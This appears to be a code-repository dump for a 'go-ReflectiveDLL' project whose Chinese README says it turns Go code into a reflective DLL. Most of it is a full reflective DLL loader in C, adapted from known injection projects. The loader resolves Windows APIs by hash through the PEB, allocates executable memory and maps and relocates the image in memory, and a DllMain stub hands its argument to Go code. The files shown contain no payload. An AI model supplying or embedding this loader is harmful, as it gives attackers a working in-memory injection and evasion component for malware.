--------------------------------------------------------------------------------
/go-ReflectiveDLL-master/README.md:
--------------------------------------------------------------------------------
 1 | #介绍
 2 | 
 3 | 将go语言代码编译成反射dll
 4 | 
 5 | https://wbglil.github.io/2020/03/15/go%E8%AF%AD%E8%A8%80%E7%BB%93%E5%90%88%E5%8F%8D%E5%B0%84dll%E6%8A%80%E6%9C%AF/
 6 | 
 7 | 相关参考链接:
 8 | https://github.com/NaniteFactory/dllmain
 9 | 
10 | https://github.com/stephenfewer/ReflectiveDLLInjection
11 | 
12 | https://github.com/rapid7/ReflectiveDLLInjection
13 | 


--------------------------------------------------------------------------------
/go-ReflectiveDLL-master/ReflectiveDll.h:
--------------------------------------------------------------------------------
  1 | //===============================================================================================//
  2 | #ifndef _REFLECTIVEDLLINJECTION_REFLECTIVELOADER_H
  3 | #define _REFLECTIVEDLLINJECTION_REFLECTIVELOADER_H
  4 | //===============================================================================================//
  5 | #define WIN32_LEAN_AND_MEAN
  6 | #define MINGW_FORCE_SYS_INTRINS
  7 | 
  8 | #include <windows.h>
  9 | #include <Winsock2.h>
 10 | #include <intrin.h>
 11 | 
 12 | 
 13 | #define DLL_QUERY_HMODULE		6
 14 | 
 15 | #define DEREF( name )*(UINT_PTR *)(name)
 16 | #define DEREF_64( name )*(DWORD64 *)(name)
 17 | #define DEREF_32( name )*(DWORD *)(name)
 18 | #define DEREF_16( name )*(WORD *)(name)
 19 | #define DEREF_8( name )*(BYTE *)(name)
 20 | 
 21 | typedef ULONG_PTR (WINAPI * REFLECTIVELOADER)( VOID );
 22 | typedef BOOL (WINAPI * DLLMAIN)( HINSTANCE, DWORD, LPVOID );
 23 | 
 24 | #define DLLEXPORT   __declspec( dllexport )
 25 | 
 26 | typedef HMODULE (WINAPI * LOADLIBRARYA)( LPCSTR );
 27 | typedef FARPROC (WINAPI * GETPROCADDRESS)( HMODULE, LPCSTR );
 28 | typedef LPVOID  (WINAPI * VIRTUALALLOC)( LPVOID, SIZE_T, DWORD, DWORD );
 29 | typedef DWORD  (NTAPI * NTFLUSHINSTRUCTIONCACHE)( HANDLE, PVOID, ULONG );
 30 | 
 31 | #define KERNEL32DLL_HASH				0x6A4ABC5B
 32 | #define NTDLLDLL_HASH					0x3CFA685D
 33 | 
 34 | #define LOADLIBRARYA_HASH				0xEC0E4E8E
 35 | #define GETPROCADDRESS_HASH				0x7C0DFCAA
 36 | #define VIRTUALALLOC_HASH				0x91AFCA54
 37 | #define NTFLUSHINSTRUCTIONCACHE_HASH	0x534C0AB8
 38 | 
 39 | #define IMAGE_REL_BASED_ARM_MOV32A		5
 40 | #define IMAGE_REL_BASED_ARM_MOV32T		7
 41 | 
 42 | #define ARM_MOV_MASK					(DWORD)(0xFBF08000)
 43 | #define ARM_MOV_MASK2					(DWORD)(0xFBF08F00)
 44 | #define ARM_MOVW						0xF2400000
 45 | #define ARM_MOVT						0xF2C00000
 46 | 
 47 | #define HASH_KEY						13
 48 | //===============================================================================================//
 49 | #pragma intrinsic( _rotr )
 50 | 
 51 | __forceinline DWORD ror( DWORD d )
 52 | {
 53 | 	return _rotr( d, HASH_KEY );
 54 | }
 55 | 
 56 | __forceinline DWORD hash( char * c )
 57 | {
 58 |     register DWORD h = 0;
 59 | 	do
 60 | 	{
 61 | 		h = ror( h );
 62 |         h += *c;
 63 | 	} while( *++c );
 64 | 
 65 |     return h;
 66 | }
 67 | //===============================================================================================//
 68 | typedef struct _UNICODE_STR
 69 | {
 70 |   USHORT Length;
 71 |   USHORT MaximumLength;
 72 |   PWSTR pBuffer;
 73 | } UNICODE_STR, *PUNICODE_STR;
 74 | 
 75 | // WinDbg> dt -v ntdll!_LDR_DATA_TABLE_ENTRY
 76 | //__declspec( align(8) )
 77 | typedef struct _LDR_DATA_TABLE_ENTRY
 78 | {
 79 | 	//LIST_ENTRY InLoadOrderLinks; // As we search from PPEB_LDR_DATA->InMemoryOrderModuleList we dont use the first entry.
 80 | 	LIST_ENTRY InMemoryOrderModuleList;
 81 | 	LIST_ENTRY InInitializationOrderModuleList;
 82 | 	PVOID DllBase;
 83 | 	PVOID EntryPoint;
 84 | 	ULONG SizeOfImage;
 85 | 	UNICODE_STR FullDllName;
 86 | 	UNICODE_STR BaseDllName;
 87 | 	ULONG Flags;
 88 | 	SHORT LoadCount;
 89 | 	SHORT TlsIndex;
 90 | 	LIST_ENTRY HashTableEntry;
 91 | 	ULONG TimeDateStamp;
 92 | } LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;
 93 | 
 94 | // WinDbg> dt -v ntdll!_PEB_LDR_DATA
 95 | typedef struct _PEB_LDR_DATA //, 7 elements, 0x28 bytes
 96 | {
 97 |    DWORD dwLength;
 98 |    DWORD dwInitialized;
 99 |    LPVOID lpSsHandle;
100 |    LIST_ENTRY InLoadOrderModuleList;
101 |    LIST_ENTRY InMemoryOrderModuleList;
102 |    LIST_ENTRY InInitializationOrderModuleList;
103 |    LPVOID lpEntryInProgress;
104 | } PEB_LDR_DATA, * PPEB_LDR_DATA;
105 | 
106 | // WinDbg> dt -v ntdll!_PEB_FREE_BLOCK
107 | typedef struct _PEB_FREE_BLOCK // 2 elements, 0x8 bytes
108 | {
109 |    struct _PEB_FREE_BLOCK * pNext;
110 |    DWORD dwSize;
111 | } PEB_FREE_BLOCK, * PPEB_FREE_BLOCK;
112 | 
113 | // struct _PEB is defined in Winternl.h but it is incomplete
114 | // WinDbg> dt -v ntdll!_PEB
115 | typedef struct __PEB // 65 elements, 0x210 bytes
116 | {
117 |    BYTE bInheritedAddressSpace;
118 |    BYTE bReadImageFileExecOptions;
119 |    BYTE bBeingDebugged;
120 |    BYTE bSpareBool;
121 |    LPVOID lpMutant;
122 |    LPVOID lpImageBaseAddress;
123 |    PPEB_LDR_DATA pLdr;
124 |    LPVOID lpProcessParameters;
125 |    LPVOID lpSubSystemData;
126 |    LPVOID lpProcessHeap;
127 |    PRTL_CRITICAL_SECTION pFastPebLock;
128 |    LPVOID lpFastPebLockRoutine;
129 |    LPVOID lpFastPebUnlockRoutine;
130 |    DWORD dwEnvironmentUpdateCount;
131 |    LPVOID lpKernelCallbackTable;
132 |    DWORD dwSystemReserved;
133 |    DWORD dwAtlThunkSListPtr32;
134 |    PPEB_FREE_BLOCK pFreeList;
135 |    DWORD dwTlsExpansionCounter;
136 |    LPVOID lpTlsBitmap;
137 |    DWORD dwTlsBitmapBits[2];
138 |    LPVOID lpReadOnlySharedMemoryBase;
139 |    LPVOID lpReadOnlySharedMemoryHeap;
140 |    LPVOID lpReadOnlyStaticServerData;
141 |    LPVOID lpAnsiCodePageData;
142 |    LPVOID lpOemCodePageData;
143 |    LPVOID lpUnicodeCaseTableData;
144 |    DWORD dwNumberOfProcessors;
145 |    DWORD dwNtGlobalFlag;
146 |    LARGE_INTEGER liCriticalSectionTimeout;
147 |    DWORD dwHeapSegmentReserve;
148 |    DWORD dwHeapSegmentCommit;
149 |    DWORD dwHeapDeCommitTotalFreeThreshold;
150 |    DWORD dwHeapDeCommitFreeBlockThreshold;
151 |    DWORD dwNumberOfHeaps;
152 |    DWORD dwMaximumNumberOfHeaps;
153 |    LPVOID lpProcessHeaps;
154 |    LPVOID lpGdiSharedHandleTable;
155 |    LPVOID lpProcessStarterHelper;
156 |    DWORD dwGdiDCAttributeList;
157 |    LPVOID lpLoaderLock;
158 |    DWORD dwOSMajorVersion;
159 |    DWORD dwOSMinorVersion;
160 |    WORD wOSBuildNumber;
161 |    WORD wOSCSDVersion;
162 |    DWORD dwOSPlatformId;
163 |    DWORD dwImageSubsystem;
164 |    DWORD dwImageSubsystemMajorVersion;
165 |    DWORD dwImageSubsystemMinorVersion;
166 |    DWORD dwImageProcessAffinityMask;
167 |    DWORD dwGdiHandleBuffer[34];
168 |    LPVOID lpPostProcessInitRoutine;
169 |    LPVOID lpTlsExpansionBitmap;
170 |    DWORD dwTlsExpansionBitmapBits[32];
171 |    DWORD dwSessionId;
172 |    ULARGE_INTEGER liAppCompatFlags;
173 |    ULARGE_INTEGER liAppCompatFlagsUser;
174 |    LPVOID lppShimData;
175 |    LPVOID lpAppCompatInfo;
176 |    UNICODE_STR usCSDVersion;
177 |    LPVOID lpActivationContextData;
178 |    LPVOID lpProcessAssemblyStorageMap;
179 |    LPVOID lpSystemDefaultActivationContextData;
180 |    LPVOID lpSystemAssemblyStorageMap;
181 |    DWORD dwMinimumStackCommit;
182 | } _PEB, * _PPEB;
183 | 
184 | typedef struct
185 | {
186 | 	WORD	offset:12;
187 | 	WORD	type:4;
188 | } IMAGE_RELOC, *PIMAGE_RELOC;
189 | 
190 | // Our loader will set this to a pseudo correct HINSTANCE/HMODULE value
191 | HINSTANCE hAppInstance = NULL;
192 | //===============================================================================================//
193 | #pragma intrinsic( _ReturnAddress )
194 | // This function can not be inlined by the compiler or we will not get the address we expect. Ideally
195 | // this code will be compiled with the /O2 and /Ob1 switches. Bonus points if we could take advantage of
196 | // RIP relative addressing in this instance but I dont believe we can do so with the compiler intrinsics
197 | // available (and no inline asm available under x64).
198 | __declspec(noinline) ULONG_PTR caller( VOID ) { return (ULONG_PTR)__builtin_return_address(0); }
199 | //===============================================================================================//
200 | 
201 | // Note 1: If you want to have your own DllMain, define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN,
202 | //         otherwise the DllMain at the end of this file will be used.
203 | 
204 | // Note 2: If you are injecting the DLL via LoadRemoteLibraryR, define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR,
205 | //         otherwise it is assumed you are calling the ReflectiveLoader via a stub.
206 | 
207 | // This is our position independent reflective DLL loader/injector
208 | 
209 | ULONG_PTR WINAPI ReflectiveLoader( LPVOID lpParameter )
210 | {
211 | 	// the functions we need
212 | 	LOADLIBRARYA pLoadLibraryA     = NULL;
213 | 	GETPROCADDRESS pGetProcAddress = NULL;
214 | 	VIRTUALALLOC pVirtualAlloc     = NULL;
215 | 	NTFLUSHINSTRUCTIONCACHE pNtFlushInstructionCache = NULL;
216 | 
217 | 	USHORT usCounter;
218 | 
219 | 	// the initial location of this image in memory
220 | 	ULONG_PTR uiLibraryAddress;
221 | 	// the kernels base address and later this images newly loaded base address
222 | 	ULONG_PTR uiBaseAddress;
223 | 
224 | 	// variables for processing the kernels export table
225 | 	ULONG_PTR uiAddressArray;
226 | 	ULONG_PTR uiNameArray;
227 | 	ULONG_PTR uiExportDir;
228 | 	ULONG_PTR uiNameOrdinals;
229 | 	DWORD dwHashValue;
230 | 
231 | 	// variables for loading this image
232 | 	ULONG_PTR uiHeaderValue;
233 | 	ULONG_PTR uiValueA;
234 | 	ULONG_PTR uiValueB;
235 | 	ULONG_PTR uiValueC;
236 | 	ULONG_PTR uiValueD;
237 | 	ULONG_PTR uiValueE;
238 | 
239 | 	// STEP 0: calculate our images current base address
240 | 
241 | 	// we will start searching backwards from our callers return address.
242 | 	uiLibraryAddress = caller();
243 | 
244 | 	// loop through memory backwards searching for our images base address
245 | 	// we dont need SEH style search as we shouldnt generate any access violations with this
246 | 	while( TRUE )
247 | 	{
248 | 		if( ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_magic == IMAGE_DOS_SIGNATURE )
249 | 		{
250 | 			uiHeaderValue = ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
251 | 			// some x64 dll's can trigger a bogus signature (IMAGE_DOS_SIGNATURE == 'POP r10'),
252 | 			// we sanity check the e_lfanew with an upper threshold value of 1024 to avoid problems.
253 | 			if( uiHeaderValue >= sizeof(IMAGE_DOS_HEADER) && uiHeaderValue < 1024 )
254 | 			{
255 | 				uiHeaderValue += uiLibraryAddress;
256 | 				// break if we have found a valid MZ/PE header
257 | 				if( ((PIMAGE_NT_HEADERS)uiHeaderValue)->Signature == IMAGE_NT_SIGNATURE )
258 | 					break;
259 | 			}
260 | 		}
261 | 		uiLibraryAddress--;
262 | 	}
263 | 
264 | 	// STEP 1: process the kernels exports for the functions our loader needs...
265 | 
266 | 	// get the Process Enviroment Block
267 | 
268 | 	uiBaseAddress = __readgsqword( 0x60 );
269 |     //uiBaseAddress = __readfsdword( 0x30 );
270 | 
271 | 	// get the processes loaded modules. ref: http://msdn.microsoft.com/en-us/library/aa813708(VS.85).aspx
272 | 	uiBaseAddress = (ULONG_PTR)((_PPEB)uiBaseAddress)->pLdr;
273 | 
274 | 	// get the first entry of the InMemoryOrder module list
275 | 	uiValueA = (ULONG_PTR)((PPEB_LDR_DATA)uiBaseAddress)->InMemoryOrderModuleList.Flink;
276 | 	while( uiValueA )
277 | 	{
278 | 		// get pointer to current modules name (unicode string)
279 | 		uiValueB = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.pBuffer;
280 | 		// set bCounter to the length for the loop
281 | 		usCounter = ((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.Length;
282 | 		// clear uiValueC which will store the hash of the module name
283 | 		uiValueC = 0;
284 | 
285 | 		// compute the hash of the module name...
286 | 		do
287 | 		{
288 | 			uiValueC = ror( (DWORD)uiValueC );
289 | 			// normalize to uppercase if the madule name is in lowercase
290 | 			if( *((BYTE *)uiValueB) >= 'a' )
291 | 				uiValueC += *((BYTE *)uiValueB) - 0x20;
292 | 			else
293 | 				uiValueC += *((BYTE *)uiValueB);
294 | 			uiValueB++;
295 | 		} while( --usCounter );
296 | 
297 | 		// compare the hash with that of kernel32.dll
298 | 		if( (DWORD)uiValueC == KERNEL32DLL_HASH )
299 | 		{
300 | 			// get this modules base address
301 | 			uiBaseAddress = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->DllBase;
302 | 
303 | 			// get the VA of the modules NT Header
304 | 			uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew;
305 | 
306 | 			// uiNameArray = the address of the modules export directory entry
307 | 			uiNameArray = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
308 | 
309 | 			// get the VA of the export directory
310 | 			uiExportDir = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress );
311 | 
312 | 			// get the VA for the array of name pointers
313 | 			uiNameArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames );
314 | 
315 | 			// get the VA for the array of name ordinals
316 | 			uiNameOrdinals = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals );
317 | 
318 | 			usCounter = 3;
319 | 
320 | 			// loop while we still have imports to find
321 | 			while( usCounter > 0 )
322 | 			{
323 | 				// compute the hash values for this function name
324 | 				dwHashValue = hash( (char *)( uiBaseAddress + DEREF_32( uiNameArray ) )  );
325 | 
326 | 				// if we have found a function we want we get its virtual address
327 | 				if( dwHashValue == LOADLIBRARYA_HASH || dwHashValue == GETPROCADDRESS_HASH || dwHashValue == VIRTUALALLOC_HASH )
328 | 				{
329 | 					// get the VA for the array of addresses
330 | 					uiAddressArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions );
331 | 
332 | 					// use this functions name ordinal as an index into the array of name pointers
333 | 					uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) );
334 | 
335 | 					// store this functions VA
336 | 					if( dwHashValue == LOADLIBRARYA_HASH )
337 | 						pLoadLibraryA = (LOADLIBRARYA)( uiBaseAddress + DEREF_32( uiAddressArray ) );
338 | 					else if( dwHashValue == GETPROCADDRESS_HASH )
339 | 						pGetProcAddress = (GETPROCADDRESS)( uiBaseAddress + DEREF_32( uiAddressArray ) );
340 | 					else if( dwHashValue == VIRTUALALLOC_HASH )
341 | 						pVirtualAlloc = (VIRTUALALLOC)( uiBaseAddress + DEREF_32( uiAddressArray ) );
342 | 
343 | 					// decrement our counter
344 | 					usCounter--;
345 | 				}
346 | 
347 | 				// get the next exported function name
348 | 				uiNameArray += sizeof(DWORD);
349 | 
350 | 				// get the next exported function name ordinal
351 | 				uiNameOrdinals += sizeof(WORD);
352 | 			}
353 | 		}
354 | 		else if( (DWORD)uiValueC == NTDLLDLL_HASH )
355 | 		{
356 | 			// get this modules base address
357 | 			uiBaseAddress = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->DllBase;
358 | 
359 | 			// get the VA of the modules NT Header
360 | 			uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew;
361 | 
362 | 			// uiNameArray = the address of the modules export directory entry
363 | 			uiNameArray = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
364 | 
365 | 			// get the VA of the export directory
366 | 			uiExportDir = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress );
367 | 
368 | 			// get the VA for the array of name pointers
369 | 			uiNameArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames );
370 | 
371 | 			// get the VA for the array of name ordinals
372 | 			uiNameOrdinals = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals );
373 | 
374 | 			usCounter = 1;
375 | 
376 | 			// loop while we still have imports to find
377 | 			while( usCounter > 0 )
378 | 			{
379 | 				// compute the hash values for this function name
380 | 				dwHashValue = hash( (char *)( uiBaseAddress + DEREF_32( uiNameArray ) )  );
381 | 
382 | 				// if we have found a function we want we get its virtual address
383 | 				if( dwHashValue == NTFLUSHINSTRUCTIONCACHE_HASH )
384 | 				{
385 | 					// get the VA for the array of addresses
386 | 					uiAddressArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions );
387 | 
388 | 					// use this functions name ordinal as an index into the array of name pointers
389 | 					uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) );
390 | 
391 | 					// store this functions VA
392 | 					if( dwHashValue == NTFLUSHINSTRUCTIONCACHE_HASH )
393 | 						pNtFlushInstructionCache = (NTFLUSHINSTRUCTIONCACHE)( uiBaseAddress + DEREF_32( uiAddressArray ) );
394 | 
395 | 					// decrement our counter
396 | 					usCounter--;
397 | 				}
398 | 
399 | 				// get the next exported function name
400 | 				uiNameArray += sizeof(DWORD);
401 | 
402 | 				// get the next exported function name ordinal
403 | 				uiNameOrdinals += sizeof(WORD);
404 | 			}
405 | 		}
406 | 
407 | 		// we stop searching when we have found everything we need.
408 | 		if( pLoadLibraryA && pGetProcAddress && pVirtualAlloc && pNtFlushInstructionCache )
409 | 			break;
410 | 
411 | 		// get the next entry
412 | 		uiValueA = DEREF( uiValueA );
413 | 	}
414 | 
415 | 	// STEP 2: load our image into a new permanent location in memory...
416 | 
417 | 	// get the VA of the NT Header for the PE to be loaded
418 | 	uiHeaderValue = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
419 | 
420 | 	// allocate all the memory for the DLL to be loaded into. we can load at any address because we will
421 | 	// relocate the image. Also zeros all memory and marks it as READ, WRITE and EXECUTE to avoid any problems.
422 | 	uiBaseAddress = (ULONG_PTR)pVirtualAlloc( NULL, ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfImage, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE );
423 | 
424 | 	// we must now copy over the headers
425 | 	uiValueA = ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfHeaders;
426 | 	uiValueB = uiLibraryAddress;
427 | 	uiValueC = uiBaseAddress;
428 | 
429 | 	while( uiValueA-- )
430 | 		*(BYTE *)uiValueC++ = *(BYTE *)uiValueB++;
431 | 
432 | 	// STEP 3: load in all of our sections...
433 | 
434 | 	// uiValueA = the VA of the first section
435 | 	uiValueA = ( (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader + ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.SizeOfOptionalHeader );
436 | 
437 | 	// itterate through all sections, loading them into memory.
438 | 	uiValueE = ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.NumberOfSections;
439 | 	while( uiValueE-- )
440 | 	{
441 | 		// uiValueB is the VA for this section
442 | 		uiValueB = ( uiBaseAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->VirtualAddress );
443 | 
444 | 		// uiValueC if the VA for this sections data
445 | 		uiValueC = ( uiLibraryAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->PointerToRawData );
446 | 
447 | 		// copy the section over
448 | 		uiValueD = ((PIMAGE_SECTION_HEADER)uiValueA)->SizeOfRawData;
449 | 
450 | 		while( uiValueD-- )
451 | 			*(BYTE *)uiValueB++ = *(BYTE *)uiValueC++;
452 | 
453 | 		// get the VA of the next section
454 | 		uiValueA += sizeof( IMAGE_SECTION_HEADER );
455 | 	}
456 | 
457 | 	// STEP 4: process our images import table...
458 | 
459 | 	// uiValueB = the address of the import directory
460 | 	uiValueB = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_IMPORT ];
461 | 
462 | 	// we assume their is an import table to process
463 | 	// uiValueC is the first entry in the import table
464 | 	uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress );
465 | 
466 | 	// itterate through all imports
467 | 	while( ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name )
468 | 	{
469 | 		// use LoadLibraryA to load the imported module into memory
470 | 		uiLibraryAddress = (ULONG_PTR)pLoadLibraryA( (LPCSTR)( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name ) );
471 | 
472 | 		// uiValueD = VA of the OriginalFirstThunk
473 | 		uiValueD = ( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->OriginalFirstThunk );
474 | 
475 | 		// uiValueA = VA of the IAT (via first thunk not origionalfirstthunk)
476 | 		uiValueA = ( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->FirstThunk );
477 | 
478 | 		// itterate through all imported functions, importing by ordinal if no name present
479 | 		while( DEREF(uiValueA) )
480 | 		{
481 | 			// sanity check uiValueD as some compilers only import by FirstThunk
482 | 			if( uiValueD && ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal & IMAGE_ORDINAL_FLAG )
483 | 			{
484 | 				// get the VA of the modules NT Header
485 | 				uiExportDir = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
486 | 
487 | 				// uiNameArray = the address of the modules export directory entry
488 | 				uiNameArray = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
489 | 
490 | 				// get the VA of the export directory
491 | 				uiExportDir = ( uiLibraryAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress );
492 | 
493 | 				// get the VA for the array of addresses
494 | 				uiAddressArray = ( uiLibraryAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions );
495 | 
496 | 				// use the import ordinal (- export ordinal base) as an index into the array of addresses
497 | 				uiAddressArray += ( ( IMAGE_ORDINAL( ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal ) - ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->Base ) * sizeof(DWORD) );
498 | 
499 | 				// patch in the address for this imported function
500 | 				DEREF(uiValueA) = ( uiLibraryAddress + DEREF_32(uiAddressArray) );
501 | 			}
502 | 			else
503 | 			{
504 | 				// get the VA of this functions import by name struct
505 | 				uiValueB = ( uiBaseAddress + DEREF(uiValueA) );
506 | 
507 | 				// use GetProcAddress and patch in the address for this imported function
508 | 				DEREF(uiValueA) = (ULONG_PTR)pGetProcAddress( (HMODULE)uiLibraryAddress, (LPCSTR)((PIMAGE_IMPORT_BY_NAME)uiValueB)->Name );
509 | 			}
510 | 			// get the next imported function
511 | 			uiValueA += sizeof( ULONG_PTR );
512 | 			if( uiValueD )
513 | 				uiValueD += sizeof( ULONG_PTR );
514 | 		}
515 | 
516 | 		// get the next import
517 | 		uiValueC += sizeof( IMAGE_IMPORT_DESCRIPTOR );
518 | 	}
519 | 
520 | 	// STEP 5: process all of our images relocations...
521 | 
522 | 	// calculate the base address delta and perform relocations (even if we load at desired image base)
523 | 	uiLibraryAddress = uiBaseAddress - ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.ImageBase;
524 | 
525 | 	// uiValueB = the address of the relocation directory
526 | 	uiValueB = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_BASERELOC ];
527 | 
528 | 	// check if their are any relocations present
529 | 	if( ((PIMAGE_DATA_DIRECTORY)uiValueB)->Size )
530 | 	{
531 | 		// uiValueC is now the first entry (IMAGE_BASE_RELOCATION)
532 | 		uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress );
533 | 
534 | 		// and we itterate through all entries...
535 | 		while( ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock )
536 | 		{
537 | 			// uiValueA = the VA for this relocation block
538 | 			uiValueA = ( uiBaseAddress + ((PIMAGE_BASE_RELOCATION)uiValueC)->VirtualAddress );
539 | 
540 | 			// uiValueB = number of entries in this relocation block
541 | 			uiValueB = ( ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION) ) / sizeof( IMAGE_RELOC );
542 | 
543 | 			// uiValueD is now the first entry in the current relocation block
544 | 			uiValueD = uiValueC + sizeof(IMAGE_BASE_RELOCATION);
545 | 
546 | 			// we itterate through all the entries in the current block...
547 | 			while( uiValueB-- )
548 | 			{
549 | 				// perform the relocation, skipping IMAGE_REL_BASED_ABSOLUTE as required.
550 | 				// we dont use a switch statement to avoid the compiler building a jump table
551 | 				// which would not be very position independent!
552 | 				if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_DIR64 )
553 | 					*(ULONG_PTR *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += uiLibraryAddress;
554 | 				else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGHLOW )
555 | 					*(DWORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += (DWORD)uiLibraryAddress;
556 | 
557 | 				else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGH )
558 | 					*(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += HIWORD(uiLibraryAddress);
559 | 				else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_LOW )
560 | 					*(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += LOWORD(uiLibraryAddress);
561 | 
562 | 				// get the next entry in the current relocation block
563 | 				uiValueD += sizeof( IMAGE_RELOC );
564 | 			}
565 | 
566 | 			// get the next entry in the relocation directory
567 | 			uiValueC = uiValueC + ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock;
568 | 		}
569 | 	}
570 | 
571 | 	// STEP 6: call our images entry point
572 | 
573 | 	// uiValueA = the VA of our newly loaded DLL/EXE's entry point
574 | 	uiValueA = ( uiBaseAddress + ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.AddressOfEntryPoint );
575 | 
576 | 	// We must flush the instruction cache to avoid stale code being used which was updated by our relocation processing.
577 | 	pNtFlushInstructionCache( (HANDLE)-1, NULL, 0 );
578 | 
579 | 	// call our respective entry point, fudging our hInstance value
580 | 
581 | 	// if we are injecting a DLL via LoadRemoteLibraryR we call DllMain and pass in our parameter (via the DllMain lpReserved parameter)
582 | 	((DLLMAIN)uiValueA)( (HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, lpParameter );
583 | 
584 | 
585 | 	// STEP 8: return our new entry point address so whatever called us can call DllMain() if needed.
586 | 	return uiValueA;
587 | }
588 | //===============================================================================================//
589 | #endif
590 | //===============================================================================================//
591 | 


--------------------------------------------------------------------------------
/go-ReflectiveDLL-master/dllmain.a:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/ReflectiveDLLInjection-Notes/5f093d120020d0f7fdad1ae3fd0d06dd9a1bb853/go-ReflectiveDLL-master/dllmain.a


--------------------------------------------------------------------------------
/go-ReflectiveDLL-master/dllmain.c:
--------------------------------------------------------------------------------
 1 | #include "dllmain.h"
 2 | #include<Windows.h>
 3 | 
 4 | 
 5 | BOOL WINAPI DllMain(
 6 |     HINSTANCE hinstDLL,  // handle to DLL module
 7 |     DWORD fdwReason,     // reason for calling function
 8 |     LPVOID lpReserved)   // reserved
 9 | {
10 |     switch (fdwReason) {
11 | 	case DLL_PROCESS_ATTACH:
12 |         {
13 |             GoString goArgs = {0};
14 |             if(lpReserved != NULL){
15 |                 goArgs.p = (char*)lpReserved;
16 |                 goArgs.n = strlen(lpReserved);
17 |             }else{
18 |                 goArgs.p = "";
19 |                 goArgs.n = 0;
20 |             }
21 |             test(goArgs);
22 |         }
23 |         break;
24 |     case DLL_PROCESS_DETACH:
25 |         // Perform any necessary cleanup.
26 |         break;
27 |     case DLL_THREAD_DETACH:
28 |         // Do thread-specific cleanup.
29 |         break;
30 |     case DLL_THREAD_ATTACH:
31 | 		// Do thread-specific initialization.
32 |         break;
33 |     }
